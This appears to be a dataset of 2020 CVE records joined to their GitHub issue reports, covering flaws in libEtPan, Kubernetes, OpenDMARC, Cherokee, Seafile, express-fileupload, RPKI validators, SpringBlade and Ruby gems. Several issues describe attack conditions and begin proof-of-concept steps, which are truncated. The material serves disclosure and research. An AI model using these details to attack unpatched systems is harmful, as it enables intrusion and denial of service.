cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2020-15953
2020-07-27T07:15:10.910
LibEtPan through 1.9.4, as used in MailCore 2 through 0.6.3 and other products, has a STARTTLS buffering issue that affects IMAP, SMTP, and POP3. When a server sends a "begin TLS" response, the client reads additional data (e.g., from a meddler-in-the-middle attacker) and evaluates it in a TLS context, aka "response in...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00060.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libetpan_project:libetpan:*:*:*:*:*:*:*:*", "matchCriteriaId": "265D13E3-68BC-4CD7-B04E-A9713F74895F", "versionEndExcluding": null, "versionEndIncluding": "1.9.4", "versionSt...
[ "74" ]
74
https://github.com/dinhvh/libetpan/issues/386
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "dinhvh", "libetpan" ]
We found a STARTTLS issue in libEtPan which affects IMAP (and probably other protocols.) When the server responds with its "let's do TLS now message", e.g. `A OK begin TLS\r\n`, libEtPan will read any data after the \r\n and save it into some internal buffer for later processing. This is problematic, because a MITM ...
Buffering issues with STARTTLS in IMAP
https://api.github.com/repos/dinhvh/libetpan/issues/386/comments
5
2020-06-18T12:09:50Z
2020-07-31T21:54:22Z
https://github.com/dinhvh/libetpan/issues/386
641,155,783
386
1,356
CVE-2020-8558
2020-07-27T20:15:12.413
The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Such a service is generally thought to be reachabl...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact":...
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/92315" }, { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Mailing List", "Miti...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "9586C74C-1239-4E96-89A6-F618D14EF889", "versionEndExcluding": null, "versionEndIncluding": "1.16.10", "versionStar...
[ "420" ]
420
https://github.com/kubernetes/kubernetes/issues/92315
[ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: In typical clusters: medium (5.4) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) In clusters where API server insecure port has not been disabled: high (8.8) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](https://...
CVE-2020-8558: Node setting allows for neighboring hosts to bypass localhost boundary
https://api.github.com/repos/kubernetes/kubernetes/issues/92315/comments
17
2020-06-19T18:38:58Z
2021-12-02T22:54:39Z
https://github.com/kubernetes/kubernetes/issues/92315
642,156,921
92,315
1,357
CVE-2020-12460
2020-07-27T23:15:12.373
OpenDMARC through 1.3.2 and 1.4.x through 1.4.0-Beta1 has improper null termination in the function opendmarc_xml_parse that can result in a one-byte heap overflow in opendmarc_xml when parsing a specially crafted DMARC aggregate report. This can cause remote memory corruption when a '\0' byte overwrites the heap metad...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/trusteddomainproject/OpenDMARC/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debia...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:trusteddomain:opendmarc:*:*:*:*:*:*:*:*", "matchCriteriaId": "48B8EAC9-8D6C-404F-855E-6D23BE1A4E81", "versionEndExcluding": null, "versionEndIncluding": "1.3.2", "versionStar...
[ "787" ]
787
https://github.com/trusteddomainproject/OpenDMARC/issues/64
[ "Exploit", "Third Party Advisory" ]
github.com
[ "trusteddomainproject", "OpenDMARC" ]
There is a memory corruption vulnerability in `opendmarc_xml()` of libopendmarc during parsing of DMARC aggregate reports. The versions affected by this seem to be OpenDMARC through 1.3.2 and 1.4.x through 1.4.0-Beta1. The root cause is improper null termination. The function opendmarc_xml_parse() does not explicitl...
Memory corruption in opendmarc_xml()
https://api.github.com/repos/trusteddomainproject/OpenDMARC/issues/64/comments
5
2020-07-25T10:48:50Z
2020-09-20T10:18:12Z
https://github.com/trusteddomainproject/OpenDMARC/issues/64
665,563,517
64
1,358
CVE-2020-12845
2020-07-27T23:15:12.437
Cherokee 0.4.27 to 1.2.104 is affected by a denial of service due to a NULL pointer dereferences. A remote unauthenticated attacker can crash the server by sending an HTTP request to protected resources using a malformed Authorization header that is mishandled during a cherokee_buffer_add call within cherokee_validator...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://cherokee-project.com/downloads.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cherokee/webserver/i...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cherokee-project:cherokee:*:*:*:*:*:*:*:*", "matchCriteriaId": "95AA5C29-D669-46CA-ADFC-91D47AD67050", "versionEndExcluding": null, "versionEndIncluding": "1.2.104", "version...
[ "476" ]
476
https://github.com/cherokee/webserver/issues/1242
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cherokee", "webserver" ]
Cherokee Web Server 0.4.27 to 1.2.104 have a NULL pointer dereference which leads to a denial of service. Any server that has HTTP authentication (either basic or digest) enabled and paths that respond with the WWW-Authenticate header, can be crashed by an unauthenticated and remote attacker by sending a malformed Aut...
NULL pointer derefence during HTTP authentication
https://api.github.com/repos/cherokee/webserver/issues/1242/comments
3
2020-07-25T11:07:45Z
2020-07-25T20:17:14Z
https://github.com/cherokee/webserver/issues/1242
665,566,101
1,242
1,359
CVE-2020-8553
2020-07-29T15:15:13.450
The Kubernetes ingress-nginx component prior to version 0.28.0 allows a user with the ability to create namespaces and to read and create ingress objects to overwrite the password file of another ingress which uses nginx.ingress.kubernetes.io/auth-type: basic and which has a hyphenated namespace or secret name.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.9, "confidentialityImpact": "PARTI...
[ { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/ingress-nginx/issues/5126" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/ingr...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*", "matchCriteriaId": "60159025-3CB0-40E3-B960-4479582F192F", "versionEndExcluding": "0.28.0", "versionEndIncluding": null, "versionSt...
[ "610" ]
610
https://github.com/kubernetes/ingress-nginx/issues/5126
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "ingress-nginx" ]
A security issue was discovered in ingress-nginx versions older than v0.28.0. The issue is of medium severity, and upgrading is encouraged to fix the vulnerability. **Am I vulnerable?** The vulnerability exists only if the annotation [nginx.ingress.kubernetes.io/auth-type: basic](https://kubernetes.github.io/ingr...
CVE-2020-8553: ingress-nginx auth-type basic annotation vulnerability
https://api.github.com/repos/kubernetes/kubernetes/issues/126818/comments
7
2020-02-19T19:00:32Z
2024-08-20T17:54:47Z
https://github.com/kubernetes/kubernetes/issues/126818
2,475,652,594
126,818
1,360
CVE-2020-16143
2020-07-29T22:15:12.277
The seafile-client client 7.0.8 for Seafile is vulnerable to DLL hijacking because it loads exchndl.dll from the current working directory.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.4, "confidentialityImpact": "PARTIA...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/haiwen/seafile-client/issues/1309" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "T...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:seafile:seafile-client:7.0.8:*:*:*:*:seafile:*:*", "matchCriteriaId": "DE8E7545-B834-4073-B7B4-7307CF492BC1", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "427" ]
427
https://github.com/haiwen/seafile-client/issues/1309
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "haiwen", "seafile-client" ]
**DLL:** exchndl.dll **Affected Process:** seaf-daemon.exe **Tested on:** Windows 10 Pro x64 Version 10.0.19041 **Description:** Seafile Client ver 7.0.8 is vulnerable to DLL hijacking because it loads “exchndl.dll” from the current working directory. **Steps to reproduce:** 1. Compile the following code ...
DLL Hijacking "exchndl.dll"
https://api.github.com/repos/haiwen/seafile-client/issues/1309/comments
3
2020-07-22T09:30:42Z
2021-02-20T12:35:36Z
https://github.com/haiwen/seafile-client/issues/1309
663,616,029
1,309
1,361
CVE-2020-7699
2020-07-30T09:15:11.373
This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/richardgirges/express-fileupload/issues/236" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:express-fileupload_project:express-fileupload:*:*:*:*:*:*:*:*", "matchCriteriaId": "75C3F9FC-7A2F-462D-84F9-F88152137F86", "versionEndExcluding": "1.1.8", "versionEndIncluding": null, ...
[ "1321" ]
1321
https://github.com/richardgirges/express-fileupload/issues/236
[ "Exploit", "Third Party Advisory" ]
github.com
[ "richardgirges", "express-fileupload" ]
This module has prototype pollution vulnerablity and it can make DOS with parseNested option. ## server ```js const express = require('express'); const fileUpload = require('express-fileupload'); const app = express(); app.use(fileUpload({ parseNested: true })); app.get('/', (req, res) => { res.end('...
Prototype Pollution
https://api.github.com/repos/richardgirges/express-fileupload/issues/236/comments
5
2020-07-29T02:48:39Z
2020-08-05T00:54:36Z
https://github.com/richardgirges/express-fileupload/issues/236
667,506,452
236
1,362
CVE-2020-16162
2020-07-30T16:15:11.850
An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. Missing validation checks on CRL presence or CRL staleness in the X509-based RPKI certificate-tree validation procedure allow remote attackers to bypass intended access restrictions by using revoked certificates. NOTE: there may be cou...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232" }, ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*", "matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A", "versionEndExcluding": null, "versionEndIncluding": "3.1-2020.07.06.14.28", ...
[ "295" ]
295
https://github.com/RIPE-NCC/rpki-validator-3/issues/162
[ "Third Party Advisory" ]
github.com
[ "RIPE-NCC", "rpki-validator-3" ]
This issue was also informally reported to RIPE NCC staff in late February 2020. It appears that RIPE NCC validator doesn't consider an expired CRL cause to consider the associated manifest and underlaying objects invalid. It logs a warning, but does not consider this situation erroneous. Theoretically a replay a...
An expired or missing CRL doesn't result in the manifest being considered invalid
https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/162/comments
1
2020-03-30T14:33:10Z
2020-07-07T10:25:09Z
https://github.com/RIPE-NCC/rpki-validator-3/issues/162
590,340,650
162
1,363
CVE-2020-16162
2020-07-30T16:15:11.850
An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. Missing validation checks on CRL presence or CRL staleness in the X509-based RPKI certificate-tree validation procedure allow remote attackers to bypass intended access restrictions by using revoked certificates. NOTE: there may be cou...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232" }, ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*", "matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A", "versionEndExcluding": null, "versionEndIncluding": "3.1-2020.07.06.14.28", ...
[ "295" ]
295
https://github.com/RIPE-NCC/rpki-validator-3/issues/232
[ "Third Party Advisory" ]
github.com
[ "RIPE-NCC", "rpki-validator-3" ]
According to documentation the default operating mode of the RIPE NCC Validator is `rpki.validator.strict-validation = false`, this means that by default the validator operates in an insecure mode which is detrimental to the users of the software. It is beyond me why I have to open so many tickets to encourage the d...
RIPE NCC Validator by default is insecure
https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/232/comments
3
2020-07-07T10:34:28Z
2020-10-29T13:30:22Z
https://github.com/RIPE-NCC/rpki-validator-3/issues/232
652,210,852
232
1,364
CVE-2020-16163
2020-07-30T16:15:11.897
An issue was discovered in RIPE NCC RPKI Validator 3.x before 3.1-2020.07.06.14.28. RRDP fetches proceed even with a lack of validation of a TLS HTTPS endpoint. This allows remote attackers to bypass intended access restrictions, or to trigger denial of service to traffic directed to co-dependent routing systems. NOTE:...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/159" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-valida...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*", "matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A", "versionEndExcluding": null, "versionEndIncluding": "3.1-2020.07.06.14.28", ...
[ "295" ]
295
https://github.com/RIPE-NCC/rpki-validator-3/issues/159
[ "Third Party Advisory" ]
github.com
[ "RIPE-NCC", "rpki-validator-3" ]
RFC 8182 section 4.3 "HTTPS Considerations" states: > Because of this, Relying Parties SHOULD do TLS certificate and host name validation when they fetch from an RRDP Repository Server. The *SHOULD* probably should be read as a *MUST*, given the validator's susceptibility to fetch from a compromised (MITM'ed) RRD...
RRDP fetches should not proceed if the TLS HTTPS endpoint doesn't validate
https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/159/comments
9
2020-03-24T13:45:25Z
2020-07-07T10:26:16Z
https://github.com/RIPE-NCC/rpki-validator-3/issues/159
586,971,181
159
1,365
CVE-2020-16164
2020-07-30T16:15:11.943
An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. It allows remote attackers to bypass intended access restrictions or to cause a denial of service on dependent routing systems by strategically withholding RPKI Route Origin Authorisation ".roa" files or X509 Certificate Revocation Lis...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/158" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*", "matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A", "versionEndExcluding": null, "versionEndIncluding": "3.1-2020.07.06.14.28", ...
[ "295" ]
295
https://github.com/RIPE-NCC/rpki-validator-3/issues/158
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "RIPE-NCC", "rpki-validator-3" ]
In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain .roa files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues. When a manifest is valid (manifest is parsa...
Missing files don't result in a manifest being considered invalid
https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/158/comments
11
2020-03-23T17:35:24Z
2020-07-07T10:26:57Z
https://github.com/RIPE-NCC/rpki-validator-3/issues/158
586,392,353
158
1,366
CVE-2020-16165
2020-07-30T20:15:12.737
The DAO/DTO implementation in SpringBlade through 2.7.1 allows SQL Injection in an ORDER BY clause. This is related to the /api/blade-log/api/list ascs and desc parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gitee.com/smallc/SpringBlade" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chillzhuang/SpringBla...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:springblade_project:springblade:*:*:*:*:*:*:*:*", "matchCriteriaId": "376B2181-19A7-4CDA-8254-6741D0DFB32D", "versionEndExcluding": null, "versionEndIncluding": "2.7.1", "ver...
[ "89" ]
89
https://github.com/chillzhuang/SpringBlade/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "chillzhuang", "SpringBlade" ]
tl;dr Flaws in DAO/DTO implementation allows SQLi in order by clause. User token and/or password hash disclosed in pre-auth APIs of which are vulnerable to SQLi above as well. detail ``` /api/blade-log/api/list ``` is exposed by default install. For instance, the demo site. ![upload_aaa29b3ad97ede8813529433d...
Pre-auth SQL injection
https://api.github.com/repos/chillzhuang/SpringBlade/issues/9/comments
3
2020-07-25T13:56:47Z
2020-08-27T11:46:37Z
https://github.com/chillzhuang/SpringBlade/issues/9
665,589,577
9
1,367
CVE-2015-9549
2020-08-03T16:15:11.927
A reflected Cross-site Scripting (XSS) vulnerability exists in OcPortal 9.0.20 via the OCF_EMOTICON_CELL.tpl FIELD_NAME field to data/emoticons.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2015-9549-ocportal.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.c...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ocportal:ocportal:9.0.20:*:*:*:*:*:*:*", "matchCriteriaId": "A2450EFF-5D36-46A0-AAD9-D40F84CA1FDA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
As per the documentation of the Ocportal, a value in a template that is not meant to contain HTML is marked as an escaped value ({VALUE*}). This meant that ‘html entities’ are put in replacement of HTML control characters. ![1](https://cloud.githubusercontent.com/assets/13975575/11140283/d4bd5918-89fe-11e5-8f92-4feb42...
OcPortal CMS 9.0.20 POC
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/11/comments
1
2015-11-13T06:56:27Z
2015-12-19T10:52:31Z
https://github.com/cybersecurityworks/Disclosed/issues/11
116,713,139
11
1,368
CVE-2020-16252
2020-08-05T14:15:12.670
The Field Test gem 0.2.0 through 0.3.2 for Ruby allows CSRF.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/field_test" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/field_test/issues/28" }, { "source": "af854a3a-...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:field_test_project:field_test:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "D654FEF7-5CF9-4B60-8BB4-684F75AC5950", "versionEndExcluding": null, "versionEndIncluding": "0.3.2", "ve...
[ "352" ]
352
https://github.com/ankane/field_test/issues/28
[ "Third Party Advisory" ]
github.com
[ "ankane", "field_test" ]
The Field Test dashboard is vulnerable to cross-site request forgery (CSRF) with non-session based authentication methods. This vulnerability has been assigned the CVE identifier CVE-2020-16252. Versions Affected: 0.2.0 to 0.3.2 Fixed Versions: 0.4.0 ## Impact The Field Test dashboard is vulnerable to CSR...
CSRF Vulnerability with Non-Session Based Authentication
https://api.github.com/repos/ankane/field_test/issues/28/comments
0
2020-08-04T20:05:09Z
2020-08-04T20:07:49Z
https://github.com/ankane/field_test/issues/28
673,048,818
28
1,369
CVE-2020-16253
2020-08-05T14:15:12.750
The PgHero gem through 2.6.0 for Ruby allows CSRF.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/pghero/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/pghero/issues/330" }, { "source": "af854a3a-2127-4...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pghero_project:pghero:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "0A0E2E1D-781E-4FDA-88C7-6141B1623113", "versionEndExcluding": null, "versionEndIncluding": "2.6.0", "versionSta...
[ "352" ]
352
https://github.com/ankane/pghero/issues/330
[ "Third Party Advisory" ]
github.com
[ "ankane", "pghero" ]
PgHero is vulnerable to cross-site request forgery (CSRF). This vulnerability has been assigned the CVE identifier CVE-2020-16253. Versions Affected: 2.6.0 and below Fixed Versions: 2.7.0 ## Impact The PgHero dashboard is vulnerable to cross-site request forgery (CSRF). This affects the Docker image, Linux pa...
CSRF Vulnerability
https://api.github.com/repos/ankane/pghero/issues/330/comments
0
2020-08-04T19:31:45Z
2020-08-04T20:07:44Z
https://github.com/ankane/pghero/issues/330
673,031,545
330
1,370
CVE-2020-16254
2020-08-05T20:15:14.740
The Chartkick gem through 3.3.2 for Ruby allows Cascading Style Sheets (CSS) Injection (without attribute).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/chartkick" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ankane/chartkick/issues/546" }, { "sou...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chartkick_project:chartkick:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "51676149-E541-4385-AD36-8DD8E2AD2593", "versionEndExcluding": null, "versionEndIncluding": "3.3.2", "vers...
[ "74" ]
74
https://github.com/ankane/chartkick/issues/546
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ankane", "chartkick" ]
The Chartkick Ruby gem is vulnerable to CSS injection if user input is passed to the `width` or `height` option. This vulnerability has been assigned the CVE identifier CVE-2020-16254. Versions Affected: 3.3.2 and below Fixed Versions: 3.4.0 ## Impact Chartkick is vulnerable to CSS injection if user inpu...
CSS injection with width and height options
https://api.github.com/repos/ankane/chartkick/issues/546/comments
5
2020-08-04T20:29:47Z
2020-10-07T09:50:18Z
https://github.com/ankane/chartkick/issues/546
673,062,235
546
1,371
CVE-2020-17366
2020-08-05T22:15:12.277
An issue was discovered in NLnet Labs Routinator 0.1.0 through 0.7.1. It allows remote attackers to bypass intended access restrictions or to cause a denial of service on dependent routing systems by strategically withholding RPKI Route Origin Authorisation ".roa" files or X509 Certificate Revocation List files from th...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/NLnetLabs/routinator/issues/319" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "htt...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nlnetlabs:routinator:*:*:*:*:*:*:*:*", "matchCriteriaId": "C070C598-464A-419E-B545-286D3C3575D6", "versionEndExcluding": null, "versionEndIncluding": "0.7.1", "versionStartEx...
[ "295" ]
295
https://github.com/NLnetLabs/routinator/issues/319
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "NLnetLabs", "routinator" ]
In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain `.roa` files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues. When a manifest is valid (manifest is par...
Missing files don't result in a Manifest/PP being considered invalid
https://api.github.com/repos/NLnetLabs/routinator/issues/319/comments
11
2020-04-28T14:53:53Z
2020-09-22T13:30:18Z
https://github.com/NLnetLabs/routinator/issues/319
608,383,235
319
1,372
CVE-2020-16248
2020-08-09T17:15:11.703
Prometheus Blackbox Exporter through 0.17.0 allows /probe?target= SSRF. NOTE: follow-on discussion suggests that this might plausibly be interpreted as both intended functionality and also a vulnerability
